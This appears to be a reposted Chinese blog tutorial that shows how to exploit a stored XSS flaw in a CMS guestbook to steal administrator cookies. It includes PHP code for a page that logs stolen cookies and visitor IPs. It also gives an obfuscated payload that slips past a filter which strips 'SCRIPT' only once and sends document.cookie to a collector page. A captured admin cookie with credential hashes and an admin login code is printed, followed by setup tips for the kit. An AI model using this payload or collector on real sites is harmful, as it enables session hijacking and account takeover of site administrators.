鬼仔注:从7j那里看到的,有7个j写接收页面。
7j:没有找到他说的接收页面,只有自己用PHP写个了
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a ");
fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");
fclose($tmp);
}
?>
来源:′失眠ヤ夜 's blog
漏洞主要出现在雁过留声(留言板)
让我们测试一下漏洞
打开留言板,选择源代码模式签署留言
在审核发表状态下钓到管理员Cookies概率比较高
我们先来试试一些文字
输入<>未被过滤
输入
输入scrSCRIPTipt会过滤成script(去掉中间的大写SCRIPT)
看 漏洞出来了
也就是说,它会把"Script"过滤掉字符,但只过滤一次,给了我们一个机会
(iframe您可以自己测试标签)
以下是一个收获Cookies会把代码Cookies提交到http://localhost/cookies/cookies.asp,我会将相关代码打包到教程中
现在我们插入一些可能的敏感字符SCRIPT防止我们的代码被过滤
更改后的代码如下:
rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();
现在我们留言
看 数据库中的代码是我们修改前的代码
现在作为管理员登录
现在我们保存cookies数据库是空的
这是我发的钓鱼Cookies的网页
好的,现在代码已经执行了,管理员Cookies已经被我们抓住了
让我们看看
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8
怎么样?得到了吗?
有管理员的用户名、密码和管理认证码
信息管理和短信也可以短信了。
这里说说吧 拿到源码后,先修改设置,conn.asp改变数据库路径
还有test.htm里的URL也要改,可以用它做测试